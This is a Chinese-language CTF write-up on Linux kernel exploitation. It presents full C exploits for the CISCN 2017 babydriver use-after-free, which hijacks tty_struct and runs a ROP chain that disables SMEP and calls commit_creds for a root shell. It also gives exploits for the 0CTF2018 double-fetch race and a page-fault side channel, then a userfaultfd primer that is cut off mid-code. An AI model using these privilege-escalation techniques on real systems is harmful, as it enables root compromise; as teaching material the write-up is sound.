一、Kernel Heap - UAF
例题:CISCN - 2017 - babydriver
典中典题,大伙珍惜,从中可以学到很多结构体的认识
1.题目逆向
首先就是检查一些脚本
#!/bin/bash
qemu-system-x86_64 -initrd core.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic
panic=1' -enable-kvm -monitor /dev/null -m 128M --nographic -smp cores=1,threads=1 -cpu kvm64,+smep
-s
- 单核单线程
- 开启smep(执行禁止)
- 在kvm64 和 +smep的情况下会自动开启KPTI
以及文件系统的启动脚本
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh
umount /proc
umount /sys
poweroff -d 0 -f
可以看到加载了一个babydriver.ko
模块,大致就是需要逆这里
因此我们例行checksec一下
dawn@dawn-virtual-machine:~/KernelLearning/babydriver$
'/home/dawn/KernelLearning/babydriver/extract/lib/modules/4.4.72/babydriver.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x0)
然后就开始我们的逆向过程,如下:
babydriver_init没必要看,大致意思就是注册了一个/dev/babydev
的设备,下面看fops
.data:00000000000008C0 ; ===========================================================================
.data:00000000000008C0
.data:00000000000008C0 ; Segment type: Pure data
.data:00000000000008C0 ; Segment permissions: Read/Write
.data:00000000000008C0 _data segment align_32 public 'DATA' use64
.data:00000000000008C0 assume cs:_data
.data:00000000000008C0 ;org 8C0h
.data:00000000000008C0 public fops
.data:00000000000008C0 ; file_operations fops
.data:00000000000008C0 C0 09 00 00 00 00 00 00 00 00+fops file_operations <offset __this_module, 0, offset babyread, offset babywrite, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 30 01 00 00+ ; DATA XREF: babydriver_init:loc_1AA↑o
.data:00000000000008C0 00 00 00 00 F0 00 00 00 00 00+ offset babyioctl, 0, 0, offset babyopen, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+ 0>
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+_data ends
.data:00000000000008C0 00 00 00 00 00 00 00 00 00 00+
这里也就是该设备的一个file_operations
,实现了read,ioctl,open,write等函数,因此我们首先看open
int __fastcall babyopen(inode *inode, file *filp)
{
__int64 v2; // rdx
_fentry__(inode, filp);
babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 64LL);
babydev_struct.device_buf_len = 64LL;
printk("device open\n", 0x24000C0LL, v2);
return 0;
}
可以看到我们open的时候,他首先调用kmem_cache_alloc_trace
函数分配了内核空间给全局变量babydev_struct
的字段,然后赋值其中长度字段为64,然后我们来看ioctl函数
// local variable allocation has failed, the output may be wrong!
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
size_t v3; // rdx
size_t v4; // rbx
__int64 v5; // rdx
_fentry__(filp, *(_QWORD *)&command);
v4 = v3;
if ( command == 0x10001 )
{
kfree(babydev_struct.device_buf);
babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
babydev_struct.device_buf_len = v4;
printk("alloc done\n", 0x24000C0LL, v5);
return 0LL;
}
else
{
printk(&unk_2EB, v3, v3);
return -22LL;
}
}
这里可以看到我们可以通过该函数来重新分配内核堆块给全局变量babydev_struct
,这样显得open有点多余了说
然后我们来看关键漏洞点,也就是release函数,或者说close函数,如下:
int __fastcall babyrelease(inode *inode, file *filp)
{
__int64 v2; // rdx
_fentry__(inode, filp);
kfree(babydev_struct.device_buf);
printk("device release\n", filp, v2);
return 0;
}
可以看到他是释放掉了我们的全局变量指向的分配堆块,但并没有赋空值,所以存在一个悬垂指针供我们利用.
其余的read和write函数就是正常的读写,没必要单独贴出来.
2.利用tty_struct
达成提权
我们的/dev
目录下面存在一个伪终端设备/dev/ptmx
,该设备打开后会创建一个tty_struct
结构体,其中同其他设备一样存在着tty_operations
结构体,因此不难理解我们可以利用UAF来劫持该结构体,然后覆写其中的函数指针至我们的ROP链来达成提权效果,大致思路如下:
- 分别打开两次,
/dev/babydev
,那么我们就能得到同时指向一个堆块的两个指针
- 我们通过ioctl函数来修改堆块的大小,改变成能劫持下面tty_struct的大小
- 然后我们释放掉其中一个设备,释放掉对应全局变量堆块,但是我们仍存在一个指向该释放堆块的指针
- 我们再打开
/dev/ptmx
设备,因此分配一个堆块来存放tty_struct
结构体
- 我们就可以利用之前还剩余的那个指针来修改
tty_struct
指向我们构造的fake_operations
(什么时候构造都可以,可以指向栈中,但是要在本步骤前熬)
- 之后我们调用
fake_operations
中的相关函数就可以达成任意代码执行,进而提权.
其中最主要的地方其实就是我们需要知道tty_struct
的大小,然后修改之前堆块的大小来满足释放的堆块重新分配了.我们接下来就是寻找他的大小,这里直接剧透为0x2e0
其中tty_struct
结构体的大致情况如下,位于include/linux/tty.h
中:
struct tty_struct {
int magic;
struct kref kref;
struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
struct tty_driver *driver;
const struct tty_operations *ops;
int index;
/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
char name[64];
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */
struct {
spinlock_t lock;
bool stopped;
bool tco_stopped;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) flow;
struct {
spinlock_t lock;
struct pid *pgrp;
struct pid *session;
unsigned char pktstatus;
bool packet;
unsigned long unused[0];
} __aligned(sizeof(unsigned long)) ctrl;
int hw_stopped;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work; //这里存在一个函数指针,可以泄露基地址
struct tty_port *port;
} __randomize_layout;
其中值得注意的就是我们的const struct tty_operations *ops;
它指向一个tty_operations
结构体,它位于include/linux/tty_driver.h
当中, 如下:
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
unsigned int (*write_room)(struct tty_struct *tty);
unsigned int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
int (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
int (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;
这里我们执行到ROP链后写cr4寄存器为0x6f0来绕过SMEP,然后打ret2user,但这里每次提权成功后返回userland的时候到swapgs后的pop rbp总会报错
0xffffffff81063694 <native_swapgs+4> swapgs
► 0xffffffff81063697 <native_swapgs+7> pop rbp
0xffffffff81063698 <native_swapgs+8> ret
↓
0xffffffff814e35ef <tty_audit_log+239> iretq
0xffffffff814e35f1 <tty_audit_log+241> ret
0xffffffff814e35f2 <tty_audit_log+242> dec dword ptr [rax - 0x75]
0xffffffff814e35f5 <tty_audit_log+245> push rbp
0xffffffff814e35f6 <tty_audit_log+246> test al, init_module+36 <72>
0xffffffff814e35f8 <tty_audit_log+248> mov esi, dword ptr [rbp - 0x50]
0xffffffff814e35fb <tty_audit_log+251> mov rdi, rbx
0xffffffff814e35fe <tty_audit_log+254> call audit_log_n_hex <audit_log_n_hex>
──────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffeb93ba830 ◂— 0x0
01:0008│ 0x7ffeb93ba838 —▸ 0xffffffff814e35ef (tty_audit_log+239) ◂— iretq
02:0010│ 0x7ffeb93ba840 —▸ 0x402001 ◂— endbr64
03:0018│ 0x7ffeb93ba848 ◂— 0x33 /* '3' */
04:0020│ 0x7ffeb93ba850 ◂— 0x246
05:0028│ 0x7ffeb93ba858 —▸ 0x7ffeb93ba7d0 —▸ 0xffff880005fc7758 ◂— 0xcc
06:0030│ 0x7ffeb93ba860 ◂— 0x2b /* '+' */
07:0038│ 0x7ffeb93ba868 ◂— 0x0
──────────────────────────────────────────────────────────────────────────────────────────────────
► f 0 0xffffffff81063697 native_swapgs+7
──────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i all-registers cr3
cr3 0x5fe2000 [ PDBR=2 PCID=0 ]
据推测这里因该确实是KPTI开启的情况,但为什么加了nopti还是有这个存在呢,难以理解,但是本题利用的过程算是摸清楚了
exp如下:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#define __USE_GNU
#include <pthread.h>
size_t prepare_kernel_cred = 0xffffffff810a1810;
size_t commit_creds = 0xffffffff810a1420;
size_t init_cred = 0xffffffff82a6b700;
const size_t pop_rdi = 0xffffffff810d238d;
const size_t pop_rsi = 0xffffffff811dd9ae;
const size_t pop_rdx = 0xffffffff81440b72;
const size_t mov_rc4_rdi_pop_rbp = 0xffffffff81004d80;
const size_t swapgs_pop_rbp = 0xffffffff81063694;
const size_t iretq = 0xffffffff8181a797;
const size_t mov_rsp_rax_ret = 0xffffffff8181bfc5;
const size_t pop_rax_ret = 0xffffffff8100ce6e;
const size_t mov_rdi_rax_pop2 = 0xffffffff8133b32e;
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
void info_log(char*);
void error_log(char*);
void saveStatus();
void get_shell();
void getRootPrivilige();
void bind_cpu(int);
size_t user_cs, user_ss, user_rflags, user_sp;
void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("Status has been saved Successfully!");
}
void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}
void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}
void get_shell(){
system("/bin/sh");
}
void getRootPrivilige(void)
{
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}
void main(){
saveStatus();
int i;
size_t buff[0x10] = {0};
size_t rop[0x100] = {0};
size_t fake_tty_operations[0x30] = {0};
PRINT_ADDR("fake_tty_operations", fake_tty_operations);
size_t tty_struct_padding[0x10] = {0};
int p = 0;
rop[p++] = pop_rdi;
rop[p++] = 0x6f0;
rop[p++] = mov_rc4_rdi_pop_rbp;
rop[p++] =((size_t)&rop&(~0xfff));
rop[p++] = getRootPrivilige;
rop[p++] = swapgs_pop_rbp;
rop[p++] = ((size_t)&rop&(~0xfff));
rop[p++] = iretq;
rop[p++] = get_shell;
rop[p++] = user_cs;
rop[p++] = user_rflags;
rop[p++] = user_sp;
rop[p++] = user_cs;
for(i = 0; i < 0x10; i++){
fake_tty_operations[i] = mov_rsp_rax_ret;
}
fake_tty_operations[0] = pop_rax_ret;
fake_tty_operations[1] = rop;
int fd1 = open("/dev/babydev", 2);
int fd2 = open("/dev/babydev", 2);
ioctl(fd1, 0x10001, 0x2e0);
close(fd1);
//alloc the UAF chunk to tty_struct
int fd3 = open("/dev/ptmx", 2);
//overwrite the tty_struct->ops
read(fd2, tty_struct_padding, 0x30);
tty_struct_padding[3] = fake_tty_operations;
write(fd2, tty_struct_padding, 0x30);
write(fd3, buff, 0x10);
}
二、Race Condition条件竞争
大伙应该都听过这个名次,也就是利用了如今计算机领域常见的同步和互斥导致问题来进行攻击
例题:0CTF2018 Final - baby kernel
整个模块就实现了ioctl,如下:
__int64 __fastcall baby_ioctl(__int64 a1, __int64 a2)
{
__int64 v2; // rdx
int i; // [rsp-5Ch] [rbp-5Ch]
__int64 v5; // [rsp-58h] [rbp-58h]
_fentry__(a1, a2);
v5 = v2;
if ( a2 == 0x6666 )
{
printk("Your flag is at %px! But I don't think you know it's content\n", flag);
return 0LL;
}
else if ( a2 == 0x1337
&& !_chk_range_not_ok(v2, 16LL, *(__readgsqword(¤t_task) + 0x1358))// check1:检查传递结构体的范围是否小于0x7ffff...
&& !_chk_range_not_ok(*v5, *(v5 + 8), *(__readgsqword(¤t_task) + 0x1358))// check2:检查结构体内容的范围是否小于0x7ffff...
&& *(v5 + 8) == strlen(flag) ) // check3:检查长度是否等于flag
{
for ( i = 0; i < strlen(flag); ++i )
{
if ( *(*v5 + i) != flag[i] )
return 22LL;
}
printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
return 0LL;
}
else
{
return 14LL;
}
}
这里可以看到他是首先给出了flag的地址,然后再与我们传入的数据结构进行比较,其中有三个check
- 检查我们的传入数据结构是否位于用户态(这里的(¤t_task)+0x1358的值是可以通过动调知道)
- 检查我们传入数据结构指向的块是否位于用户态
- 检查指向块的长度是否位于用户态
检查完毕后再来查看我们传入的块里面的数据是否等于flag值,如果等于则打印在内核输出当中
下面就是本次讲解的例题手法
1.double fetch
这里的doube fetch就是两次取的意思,我们可以知道,在内核检测数据的过程中,以及到达开始比较的过程当中,这一段缝隙对于人来说可能是十分短且可以忽略的地方,而对于程序来说那就不是这样了,我们可以充分利用这段间隙,在该地址通过检测的情况下再立刻修改他指向的值,这样就可以绕过检测,这里给出a3师傅的图
这里值得注意的一点就是再我们使用pthread
函数簇的时候,记得编译选项加上-lpthread
我们的exp如下:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#include <pthread.h>
#include <sys/types.h>
#include <string.h>
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
pthread_t compete_thread;
char buf[0x30] = "peiwithhao";
int competition_time = 0x1000, status = 1;
long long real_addr;
struct{
void* flag_addr;
size_t flag_len;
}flag = {.flag_addr = buf, .flag_len = 33};
void* competition_thread(void){
while(status){
for(int i = 0; i< competition_time ; i++){
flag.flag_addr = real_addr;
}
}
}
void info_log(char*);
void error_log(char*);
void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}
void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}
void main(){
int fd = open("/dev/baby", 2);
ioctl(fd, 0x6666);
system("dmesg | grep flag > addr.txt");
int addr_fd = open("/addr.txt", 0);
lseek(addr_fd, 31, SEEK_SET);
char buf[0x10] = {0};
char* temp = (char*)malloc(0x1000);
buf[read(addr_fd, buf, 0x10)] = '\0';
sscanf(buf, "%lx", &real_addr);
PRINT_ADDR("flag", real_addr);
pthread_create(&compete_thread, NULL, competition_thread, NULL);
while(status){
for(int i = 0; i < competition_time ; i++){
flag.flag_addr = buf;
ioctl(fd, 0x1337, &flag);
}
system("dmesg | grep flag > result.txt");
int result_fd = open("/result.txt", 0);
read(result_fd, temp, 0x1000);
if(strstr(temp, "flag{")){
status = 0;
}
}
pthread_cancel(compete_thread);
info_log("finish");
system("dmesg | grep flag");
}
2. 侧信道
顾名思义,其就是使用一种完全偏离正常解题思路的一种攻击手段,譬如更加像物理黑客那样达成自己的目的,有的侧信道解法甚至使用到加解密判断中运行时长的差别来判断整体程序的运行。本题同样存在侧信道解法。
我们在上面都接触到,只有题目中传递到了正确的flag值我们才可以获取flag,但是就这么个检查flag的过程是一个字节一个字节检测的,所以说我们可以采用下面这个思路:
- 我们每次传递一定长度的flag值,并逐位进行爆破
- 每次判断正确的办法也很简单,如果我们传递了错误的值,程序就会正常退出,如果我们传递正确的值该怎么办呢,这里给出解答,我们可以mmap出一页范围,然后将部分flag置于页末尾,那么如果我们flag的最后一个符号匹配,程序就会接着往后面访问判断是否匹配,但是这就到了下一页,其大概率会出现访问panic
大致情况如下:
如下exp,我们可以通过传递参数的方式来猜:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#include <pthread.h>
#include <sys/types.h>
#include <string.h>
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
pthread_t compete_thread;
char *buf;
int competition_time = 0x1000, status = 1;
long long real_addr;
struct{
void* flag_addr;
size_t flag_len;
}flag = {.flag_len = 33};
void* competition_thread(void){
while(status){
for(int i = 0; i< competition_time ; i++){
flag.flag_addr = real_addr;
}
}
}
void info_log(char*);
void error_log(char*);
void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}
void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}
void main(int argc, char** argv){
int fd = open("/dev/baby", 2);
if(argc < 2){
error_log("Usage: ./exp <flag>");
}
int flag_len = strlen(argv[1]);
buf = (char *)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
void* flag_addr = buf + 0x1000 - flag_len;
memcpy(flag_addr, argv[1], flag_len);
flag.flag_addr = flag_addr;
ioctl(fd, 0x1337, &flag);
}
例题:强网杯2021线上赛-notebook
1.userfaultfd基础
该类技术就是让我们用户来处理本该由内核处理的事件,其中就比如缺页异常等。
userfaultfd 机制让在用户控制缺页处理提供可能,进程可以在用户空间为自己的程序定义page fault handler,增加了灵活性,但也可能由于类似FUSE之于内核FS的问题(调用层次加深)而影响性能。
他被实现一个系统调用供我们使用,我们可以查看其帮助手册,如下
SYNOPSIS
#include <sys/types.h>
#include <linux/userfaultfd.h>
int userfaultfd(int flags);
Note: There is no glibc wrapper for this system call; see NOTES.
DESCRIPTION
userfaultfd() creates a new userfaultfd object that can be used for delegation of page-fault handling to a user-space application, and returns a file descriptor that refers to the new object. The new userfaultfd ob?
ject is configured using ioctl(2).
Once the userfaultfd object is configured, the application can use read(2) to receive userfaultfd notifications. The reads from userfaultfd may be blocking or non-blocking, depending on the value of flags used for
the creation of the userfaultfd or subsequent calls to fcntl(2).
The following values may be bitwise ORed in flags to change the behavior of userfaultfd():
O_CLOEXEC
Enable the close-on-exec flag for the new userfaultfd file descriptor. See the description of the O_CLOEXEC flag in open(2).
O_NONBLOCK
Enables non-blocking operation for the userfaultfd object. See the description of the O_NONBLOCK flag in open(2).
When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.
Usage
The userfaultfd mechanism is designed to allow a thread in a multithreaded program to perform user-space paging for the other threads in the process. When a page fault occurs for one of the regions registered to the
userfaultfd object, the faulting thread is put to sleep and an event is generated that can be read via the userfaultfd file descriptor. The fault-handling thread reads events from this file descriptor and services
them using the operations described in ioctl_userfaultfd(2). When servicing the page fault events, the fault-handling thread can trigger a wake-up for the sleeping thread.
It is possible for the faulting threads and the fault-handling threads to run in the context of different processes. In this case, these threads may belong to different programs, and the program that executes the
faulting threads will not necessarily cooperate with the program that handles the page faults. In such non-cooperative mode, the process that monitors userfaultfd and handles page faults needs to be aware of the
changes in the virtual memory layout of the faulting process to avoid memory corruption.
Starting from Linux 4.11, userfaultfd can also notify the fault-handling threads about changes in the virtual memory layout of the faulting process. In addition, if the faulting process invokes fork(2), the user?
faultfd objects associated with the parent may be duplicated into the child process and the userfaultfd monitor will be notified (via the UFFD_EVENT_FORK described below) about the file descriptor associated with the
userfault objects created for the child process, which allows the userfaultfd monitor to perform user-space paging for the child process. Unlike page faults which have to be synchronous and require an explicit or
implicit wakeup, all other events are delivered asynchronously and the non-cooperative process resumes execution as soon as the userfaultfd manager executes read(2). The userfaultfd manager should carefully synchro?
nize calls to UFFDIO_COPY with the processing of events.
userfaultfd()函数被使用来创建一个结构体,用作用户空间的缺页处理,并返回一个文件描述符,并且该结构体使用ioctl进行配置,配置过后我们就可以使用read函数读取其中的userfaultfd消息,该行为是否会被阻塞取决于创建uffd结构体时的flag值或连续的fcntl
调用
我们要使用他,首先需要获得上面这样一个结构体,使用如下代码:
long uffd = syscall(_NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
获得这样一个结构体后,我们需要使用ioctl来进行之后的配置、注册内存区域、或者说是缺页处理,其中ioctl的命令参数如下:
- UFFDIO_REGESTER: 注册一个监视区域
- UFFDIO_COPY: 上面的区域出现缺页后,使用该命令来像缺页的地址拷贝自定义数据
然后我们需要使用mmap来映射出一片匿名区域,然后将其定义为监视区,再使用iotctl注册该区域
// 注册时要用一个struct uffdio_register结构传递注册信息:
// struct uffdio_range {
// __u64 start; /* Start of range */
// __u64 len; /* Length of range (bytes) */
// };
//
// struct uffdio_register {
// struct uffdio_range range;
// __u64 mode; /* Desired mode of operation (input) */
// __u64 ioctls; /* Available ioctl() operations (output) */
// };
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
addr = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)
// addr 和 len 分别是我匿名映射返回的地址和长度,赋值到uffdio_register
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
// mode 只支持 UFFDIO_REGISTER_MODE_MISSING
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
// 用ioctl的UFFDIO_REGISTER注册
ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);
然后我们就需要启动一个线程进行轮询,来捕获对于我们该页的异常
// 主进程中调用pthread_create创建一个fault handler线程
pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
一个自定义的线程函数举例如下,这里处理的是一个普通的匿名页用户态缺页,我们要做的是把我们一个已有的一个page大小的buffer内容拷贝到缺页的内存地址处。用到了poll函数轮询uffd,并对轮询到的UFFD_EVENT_PAGEFAULT事件(event)用拷贝(ioctl的UFFDIO_COPY选项)进行处理。
上面一段是我引用Jcix师傅的原话,侵删~~
下面就是我们的fault_handler_thread
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;) {
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}
我们的整个手册上的测试用例如下:
/* userfaultfd_demo.c
Licensed under the GNU General Public License version 2 or later.
*/
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
static int page_size;
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;) {
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}
int
main(int argc, char *argv[])
{
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;
if (argc != 2) {
fprintf(stderr, "Usage: %s num-pages\n", argv[0]);
exit(EXIT_FAILURE);
}
page_size = sysconf(_SC_PAGE_SIZE);
len = strtoul(argv[1], NULL, 0) * page_size;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
